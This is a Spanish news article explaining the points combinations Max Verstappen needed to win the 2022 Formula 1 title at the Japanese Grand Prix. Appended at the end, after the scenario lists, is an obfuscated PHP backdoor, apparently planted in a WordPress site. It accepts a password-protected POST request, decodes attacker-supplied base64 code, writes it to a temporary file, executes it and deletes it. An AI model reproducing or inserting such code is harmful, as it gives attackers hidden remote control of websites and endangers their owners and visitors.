¿Qué necesita Verstappen para ganar el Mundial de F1 en el GP de Japón?

El piloto neerlandés de Red Bull puede lograr su segundo título de Fórmula 1 en Suzuka, a falta de cuatro carreras para el final. Le vale con ganar y conseguir la vuelta rápida.

A falta de cuatro citas para poner el broche de oro a la temporada 2022, Max Verstappen está a un paso de coronarse campeón del mundo por segunda vez. Tuvo su primera bola de partido la pasada semana en Singapur, pero una clasificación echada a perder por falta de combustible (salió octavo) y una carrera con condiciones adversas, dejaba el alirón pendiente hasta el GP de Japón. Las opciones eran complicadas, porque todas las ecuaciones pasaban por ganar la carrera Marina Bay (acabó séptimo), pero en Suzuka las posibilidades ya están mucho más claras. Nunca es fácil en la Fórmula 1, pero al piloto de Red Bull le será tan sencillo como llevarse la victoria y el punto extra de la vuelta rápida.

De esa manera, Verstappen se adjudicaría su segundo Mundial de Fórmula 1 y, además, de manera consecutiva. Sin embargo, aunque es la posibilidad más directa para el neerlandés, no es, ni mucho menos, la única ecuación que tiene para coronarse en Japón. Las perspectivas son mucho más optimistas que en Singapur y, de hecho, la opción del punto extra por vuelta rápida abre un gran abanico de posibilidades a tener en cuenta. Lo esencial es lo siguiente: Verstappen tiene que acabar el fin de semana ampliando ocho puntos más su distancia sobre el segundo clasificado, Charles Leclerc a 104 puntos, y seis más al tercero, su compañero de equipo, Checo Pérez, a 106 puntos.

Opciones con punto de vuelta rápida

  • Si Max gana la carrera
  • Si es 2º y Leclerc termina 5º o peor y Pérez es 4º o peor
  • Si es 3º y Leclerc termina 6º o peor y Pérez es 5º o peor
  • Si es 4º y Leclerc termina 8º o peor y Pérez es 7º o peor
  • Si es 5º y Leclerc termina 9º o peor y Pérez es 8º o peor
  • Si es 6º y Leclerc termina 10º o peor y Pérez es 9º o peor

A falta de cuatro carreras y una al sprint, lo que está más que claro es que el bicampeonato para Verstappen pasa por ser mejor que sus rivales y su posición mínima debe ser un sexto puesto, con o sin punto extra por vuelta rápida. Todo recae en sus manos, durante un fin de semana en el que habrá que mirar al cielo ante las posibilidades de lluvia. De hecho, este viernes las sesiones ya se rodaron en mojado, lo cual abre mucho más las opciones. De retrasarse el alirón, la siguiente oportunidad llegará el 23 de octubre, en el Gran Premio de Estados Unidos.

Opciones sin punto de vuelta rápida

  • Si Max gana y Leclerc es 3º o peor
  • Si es 2º y Leclerc termina 5º o peor y Pérez es 4º o peor
  • Si es 3º y Leclerc termina 7º o peor y Pérez es 5º o peor
  • Si es 4º y Leclerc termina 8º o peor y Pérez es 7º o peor
  • Si es 5º y Leclerc termina 9º o peor y Pérez es 8º o peor
  • Si es 6º y Leclerc no puntúa y Pérez es 9º o peor
if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}